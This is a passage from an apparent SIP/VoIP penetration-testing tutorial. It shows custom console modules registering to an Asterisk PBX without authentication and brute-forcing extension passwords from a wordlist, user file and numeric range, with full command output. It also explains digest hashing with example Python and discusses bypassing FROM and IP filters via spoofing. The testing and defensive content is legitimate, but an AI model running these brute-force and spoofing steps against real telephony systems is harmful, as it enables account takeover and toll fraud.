    [+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized
    [*] Server : Asterisk PBX 1.6.2.11
    [*] Realm : asterisk
    [*] Scanned 1 of 1 hosts (100% complete)
    Holdenusploit auxiliary(gsipregister) # set USERNAME 2000
    USERNAME => 2000
    Holdenusploit auxiliary(gsipregister) # run
    [+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized
    [*] Server : Asterisk PBX 1.6.2.11
    [*] Realm : asterisk
    [*] Scanned 1 of 1 hosts (100% complete)

The USER_AS_FROM_AND_TO variable is useful when a SIP server requires the FROM and TO fields to be the USERNAME. In this case, the USER_AS_FROM_AND_TO variable is changed to false and TO is changed to 100. A REGISTER request is initiated with 1000 in the FROM field and 100 in the TO field, and a 200 OK response is received for this REGISTER attempt. This means the SIP server accepts REGISTER requests under one condition: the TO field must be 100. The target number 100 must be some kind of value added service number or a number for a special purpose.

    Holdenusploit auxiliary(gsipregister) # set USER_AS_FROM_and_TO false
    USER_AS_FROM_and_TO => false
    Holdenusploit auxiliary(gsipregister) # set TO 100
    TO => 100
    Holdenusploit auxiliary(gsipregister) # run
    [+] 172.16.100.6:5060 Response: 200 OK
    [*] Server : Asterisk PBX 1.6.2.11
    [*] Scanned 1 of 1 hosts (100% complete)

SIP Server Registration Without Authentication

Special tests should be performed for other cases such as IP based filters, a special FROM field or a Proxy field. The FROM field can be changed in my module, so FROM based filtering can be bypassed. Proxy field or IP based filtering can only be tested on a test specific basis. I will add Custom Header Support to my SIP modules; this feature will help with Proxy based tests. IP based tests will be demonstrated in the INVITE tests for trunks, where IP spoofing will be performed using hping3.

2.2 Brute Forcing Target Accounts

Registering with a SIP server is the first step of SIP service analysis, and it mostly requires authentication. The authentication system of the SIP service is based on challenge-response. The challenge is the nonce field of the WWW-Authenticate: header, and 3 hashes should be calculated with this string. The first hash is calculated as MD5(user:realm:password), the second hash is calculated as MD5(requestname:uri) and the final hash is calculated as MD5(hash1:nonce:hash2). This final hash is required when sending the authentication information. The brute force attack can be performed in three ways: against a confirmed account, against a user list in a file, or against a numeric range. A powerful password wordlist file is required for this brute force attack. An account's password can be identified with this password file once the account has been confirmed. Another option is trying this password file against a user list or a numeric range. My brute force module supports all 3 of these attack types, with a single password or a password file. The next examples include the brute forcing methods and the usage of the modules.

First Case : Brute Forcing a Valid Account with a Password File (Account User is 2000)

    Holdenusploit # use auxiliary/gamasec/sip/gsipbruteforce
    Holdenusploit auxiliary(gsipbruteforce) # show options

    Module options (auxiliary/gamasec/sip/gsipbruteforce):

       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       BLANK_PASSWORDS      true             no        Try blank passwords for all users
       BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
       CHOST                                 no        The local client address
       CPORT                5065             no        The local client port
       DEBUG                false            no        Debug Level
       DEREGISTER           false            yes       DeRegister After Successful Login
       FROM                 1000             no        The source username to probe
       METHOD               REGISTER         yes       The method for Brute Forcing (REGISTER)
       NUMERIC_MAX          9999             yes       Ending extension
       NUMERIC_MIN          0                yes       Starting extension
       NUMERIC_USERS        false            yes       Numeric Username Bruteforcing
       PASSWORD             NOPASSWORD       no        The login password to probe
       PASS_FILE                             no        File containing passwords, one per line
       REALM                realm.com.tr     yes       The login realm to probe
       RHOST                                 yes       The target address
       RPORT                5060             yes       The target port
       STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
       THREADS              1                yes       The number of concurrent threads
       TO                   1000             no        The destination username to probe
       USERNAME             NOUSER           no        The login username to probe
       USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
       USER_AS_FROM_and_TO  true             yes       Try the username as the from/to for all users
       USER_AS_PASS         false            no        Try the username as the password for all users
       USER_FILE                             no        File containing usernames, one per line
       VERBOSE              true             yes       Whether to print output for all attempts

    Holdenusploit auxiliary(gsipbruteforce) # set USERNAME 2000
    USERNAME => 2000
    Holdenusploit auxiliary(gsipbruteforce) # set RHOST 172.16.100.6
    RHOST => 172.16.100.6
    Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords"
    PASS_FILE => /tmp/passwords
    Holdenusploit auxiliary(gsipbruteforce) # run
    [*] Trying username:'2000' with password:''
    [*] 172.16.100.6:5060 - [01/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'nopassword'
    [*] 172.16.100.6:5060 - [02/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'deneme1234'
    [*] 172.16.100.6:5060 - [03/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'1244'
    [*] 172.16.100.6:5060 - [04/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'dene'
    [*] 172.16.100.6:5060 - [05/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'password123'
    [+] user : 2000 password : password123 result : Request Succeed
    [*] Trying username:'2000' with password:'lsadhflkajshf'
    [*] 172.16.100.6:5060 - [07/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'s3cur3'
    [*] 172.16.100.6:5060 - [08/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'letmein123'
    [*] 172.16.100.6:5060 - [09/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'secret123'
    [*] 172.16.100.6:5060 - [10/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)
    [*] Trying username:'2000' with password:'quit3s3cure123'
    [*] 172.16.100.6:5060 - [11/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth)

Brute Forcing a Valid Account with a Password File

Second Case : Brute Forcing an Account File with a Password File

    Holdenusploit auxiliary(gsipbruteforce) # show options

    Module options (auxiliary/gamasec/sip/gsipbruteforce):

       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       BLANK_PASSWORDS      true             no        Try blank passwords for all users
       BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
       CHOST                                 no        The local client address
       CPORT                5065             no        The local client port
       DEBUG                false            no        Debug Level
       DEREGISTER           false            yes       DeRegister After Successful Login
       FROM                 1000             no        The source username to probe
       METHOD               REGISTER         yes       The method for Brute Forcing (REGISTER)
       NUMERIC_MAX          9999             yes       Ending extension
       NUMERIC_MIN          0                yes       Starting extension
       NUMERIC_USERS        false            yes       Numeric Username Bruteforcing
       PASSWORD             NOPASSWORD       no        The login password to probe
       PASS_FILE                             no        File containing passwords, one per line
       REALM                realm.com.tr     yes       The login realm to probe
       RHOST                                 yes       The target address
       RPORT                5060             yes       The target port
       STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
       THREADS              1                yes       The number of concurrent threads
       TO                   1000             no        The destination username to probe
       USERNAME             NOUSER           no        The login username to probe
       USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
       USER_AS_FROM_and_TO  true             yes       Try the username as the from/to for all users
       USER_AS_PASS         false            no        Try the username as the password for all users
       USER_FILE                             no        File containing usernames, one per line
       VERBOSE              true             yes       Whether to print output for all attempts

    Holdenusploit auxiliary(gsipbruteforce) # set RHOST 172.16.100.6
    RHOST => 172.16.100.6
    Holdenusploit auxiliary(gsipbruteforce) # set USER_FILE "/tmp/users"
    USER_FILE => /tmp/users
    Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords"
    PASS_FILE => /tmp/passwords
    Holdenusploit auxiliary(gsipbruteforce) # unset USERNAME
    Unsetting USERNAME...
    Holdenusploit auxiliary(gsipbruteforce) # set VERBOSE false
    VERBOSE => false
    Holdenusploit auxiliary(gsipbruteforce) # run
    [+] user : 100 password :  result : Request Succeed without Login Information
    [+] user : 100 password : NOPASSWORD result : Request Succeed without Login Information
    [+] user : 2000 password : password123 result : Request Succeed
    [+] user : 100 password : deneme1234 result : Request Succeed without Login Information
    [+] user : 100 password : 1244 result : Request Succeed without Login Information
    [+] user : 100 password : dene result : Request Succeed without Login Information
    [+] user : 100 password : password123 result : Request Succeed without Login Information
    [+] user : 100 password : lsadhflkajshf result : Request Succeed without Login Information
    [+] user : 100 password : s3cur3 result : Request Succeed without Login Information
    [+] user : 100 password : letmein123 result : Request Succeed without Login Information
    [+] user : 100 password : secret123 result : Request Succeed without Login Information
    [+] user : 100 password : quit3s3cure123 result : Request Succeed without Login Information

Brute Forcing an Account File with a Password File

Third Case : Brute Forcing a Numeric Range (0-2100) with a Password File

    Holdenusploit auxiliary(gsipbruteforce) # show options

    Module options (auxiliary/gamasec/sip/gsipbruteforce):

       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       BLANK_PASSWORDS      true             no        Try blank passwords for all users
       BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
       CHOST                                 no        The local client address
       CPORT                5065             no        The local client port
       DEBUG                false            no        Debug Level
       DEREGISTER           false            yes       DeRegister After Successful Login
       FROM                 1000             no        The source username to probe
       METHOD               REGISTER         yes       The method for Brute Forcing (REGISTER)
       NUMERIC_MAX          9999             yes       Ending extension
       NUMERIC_MIN          0                yes       Starting extension
       NUMERIC_USERS        false            yes       Numeric Username Bruteforcing
       PASSWORD             NOPASSWORD       no        The login password to probe
       PASS_FILE                             no        File containing passwords, one per line
       REALM                realm.com.tr     yes       The login realm to probe
       RHOST                                 yes       The target address
       RPORT                5060             yes       The target port
       STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
       THREADS              1                yes       The number of concurrent threads
       TO                   1000             no        The destination username to probe
       USERNAME             NOUSER           no        The login username to probe
       USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
       USER_AS_FROM_and_TO  true             yes       Try the username as the from/to for all users
       USER_AS_PASS         false            no        Try the username as the password for all users
       USER_FILE                             no        File containing usernames, one per line
       VERBOSE              true             yes       Whether to print output for all attempts

    Holdenusploit auxiliary(gsipbruteforce) # unset USER_FILE
    Unsetting USER_FILE...
    Holdenusploit auxiliary(gsipbruteforce) # unset PASS_FILE
    Unsetting PASS_FILE...
    Holdenusploit auxiliary(gsipbruteforce) # set NUMERIC_USERS true
    NUMERIC_USERS => true
    Holdenusploit auxiliary(gsipbruteforce) # set NUMERIC_MAX 2100
    NUMERIC_MAX => 2100
    Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords"
    PASS_FILE => /tmp/passwords
    Holdenusploit auxiliary(gsipbruteforce) # run
    [+] user : 100 password : NOPASSWORD result : Request Succeed without Login Information
    [+] user : 100 password : deneme1234 result : Request Succeed without Login Information
    [+] user : 100 password : 1244 result : Request Succeed without Login Information
    [+] user : 100 password : dene result : Request Succeed without Login Information
    [+] user : 100 password : password123 result : Request Succeed without Login Information
    [+] user : 100 password : lsadhflkajshf result : Request Succeed without Login Information
    [+] user : 100 password : s3cur3 result : Request Succeed without Login Information
    [+] user : 100 password : letmein123 result : Request Succeed without Login Information
    [+] user : 100 password : secret123 result : Request Succeed without Login Information
    [+] user : 100 password : quit3s3cure123 result : Request Succeed without Login Information
    [+] user : 101 password : s3cur3 result : Request Succeed
    [+] user : 102 password : letmein123 result : Request Succeed
    [+] user : 200 password : quit3s3cure123 result : Request Succeed
    [+] user : 201 password : secret123 result : Request Succeed
    [+] user : 2000 password : password123 result : Request Succeed

Brute Forcing Numeric Accounts with a Password File
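The three-hash computation that section 2.2 opens with is worth seeing end to end, because it is what every REGISTER with credentials, and every guess the brute force module sends, boils down to. The code below is an added example for this document, not code from the Viproy modules or from Asterisk: a client-side function that produces the response exactly as the text describes (MD5(hash1:nonce:hash2), the RFC 2617 form without qop, and as an extension the qop="auth" form with nc and cnonce), and a small server-side verifier that is an assumed design, storing only hash1 per account, issuing a fresh random nonce per challenge and consuming it on every attempt. The realm "asterisk", account 2000 and password "password123" are taken from the session above; the Request-URI and the cnonce value are assumptions.

```python
import hashlib
import hmac
import secrets

# Added example for this document; not part of the Viproy modules or of any PBX.
# SIP digest authentication as described in section 2.2 (RFC 2617, MD5).


def md5_hex(data: str) -> str:
    """MD5 hex digest of a UTF-8 string; SIP digest authentication uses MD5."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def hash1(username: str, realm: str, password: str) -> str:
    """First hash: MD5(user:realm:password)."""
    return md5_hex(f"{username}:{realm}:{password}")


def hash2(method: str, uri: str) -> str:
    """Second hash: MD5(requestname:uri), e.g. REGISTER and the Request-URI."""
    return md5_hex(f"{method}:{uri}")


def digest_response(h1, method, uri, nonce, qop=None, nc=None, cnonce=None):
    """Final hash carried in the Authorization header.

    Without qop (the form described in the text): MD5(hash1:nonce:hash2).
    With qop="auth" (RFC 2617 extension): MD5(hash1:nonce:nc:cnonce:qop:hash2).
    """
    h2 = hash2(method, uri)
    if qop is None:
        return md5_hex(f"{h1}:{nonce}:{h2}")
    if nc is None or cnonce is None:
        raise ValueError("qop requires nc and cnonce")
    return md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


def client_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """What a SIP client (or a brute force module, once per guess) computes."""
    h1 = hash1(username, realm, password)
    return digest_response(h1, method, uri, nonce, qop, nc, cnonce)


class Registrar:
    """Minimal server-side verifier (assumed design, not any real PBX's code).

    Only hash1 is kept per account, so the plaintext password never sits on
    the server; each challenge gets a fresh random nonce that is consumed on
    the first verification attempt, so a captured response cannot be replayed.
    """

    def __init__(self, realm: str):
        self.realm = realm
        self._h1 = {}          # username -> hash1
        self._nonces = set()   # issued nonces not yet consumed

    def add_account(self, username: str, password: str) -> None:
        self._h1[username] = hash1(username, self.realm, password)

    def challenge(self) -> str:
        """Value for the nonce= parameter of the WWW-Authenticate header."""
        nonce = secrets.token_hex(16)
        self._nonces.add(nonce)
        return nonce

    def verify(self, username, method, uri, nonce, response,
               qop=None, nc=None, cnonce=None) -> bool:
        if nonce not in self._nonces:
            return False       # unknown, expired or already used nonce
        self._nonces.discard(nonce)
        # An unknown account fails exactly like a wrong password, so the
        # verdict does not reveal whether the username exists.
        h1 = self._h1.get(username)
        if h1 is None:
            return False
        expected = digest_response(h1, method, uri, nonce, qop, nc, cnonce)
        return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    reg = Registrar("asterisk")
    reg.add_account("2000", "password123")
    nonce = reg.challenge()
    resp = client_response("2000", "asterisk", "password123",
                           "REGISTER", "sip:172.16.100.6", nonce)
    print("valid credentials accepted:",
          reg.verify("2000", "REGISTER", "sip:172.16.100.6", nonce, resp))
```

Nothing in the exchange besides the password is secret: realm, nonce, method and URI all travel in the clear, so anyone holding one challenge and its response can test candidate passwords offline at MD5 speed, and an online guesser simply repeats the computation per attempt as the module output above shows. That is why the extension passwords in a wordlist like the one above fall quickly, and why password strength, per-source attempt limits and single-use nonces are the controls that matter on the registrar side.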

3 Authorization Analysis of SIP Services

3.1 Direct Invite Attempt

As mentioned above, the authentication function depends on the features and role of the SIP service. Authentication may not be required or initiated on SIP trunks, SIP clients and default installations. Generally, SIP trunks are defined by an IP address or a specific FROM number. Challenge-response or certificate based authentication is too slow to give quick responses at this kind of large call volume. Because of that, SIP trunks either have no password or use an IP based filter for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Many SIP clients support REGISTER and INVITE without authentication. SIP servers and devices cannot authenticate users without the right configuration, and most default installations do not support authentication. Moreover, SIP servers have special target numbers that accept calls for voice message boxes, value added services or gateways. Registration without a password is possible in this kind of configuration. Based on this information, all SIP servers should be analyzed for call initiation without authentication.

Depending on the cases mentioned above, INVITE requests should be used to initiate a call to a target number; the INVITE method also supports authentication. The authentication feature will be required later, but this test should be performed to detect the valid target numbers that can be reached without authentication. My invite module can be used for INVITE tests; it supports the basic INVITE options.

Important Information for INVITE Tests

Many SIP clients accept calls without authentication and ignore the TO field of the INVITE request. Because of this problem, INVITE tests against SIP clients should not be automated. Only one INVITE request should be sent to the service, and the state of the SIP clients should be checked after the test. IP based filtering is the most preferred way of placing SIP trunks. A SIP service accepts calls without authentication if they are sent from a valid IP address and UDP port. IP spoofing will be required to bypass this type of restriction; this will be discussed under SIP requests with IP spoofing.

Incremental target number fuzzing in INVITE tests is dangerous, because all numbers will ring at the same time, and this is a Denial of Service attack. Last but not least, the VIA/FROM/TO fields depend on each other. All tests should be performed with a proper INVITE request; invalid INVITE requests give unreliable results. For example, the target number 131 may accept calls only from 100, because 100 is the international gateway. In the next test, direct INVITE requests are sent to the target SIP service. The result is 401 Unauthorized if the target number is our valid account 2000. As mentioned in the important information section, the FROM and TO fields should be changed for test reliability.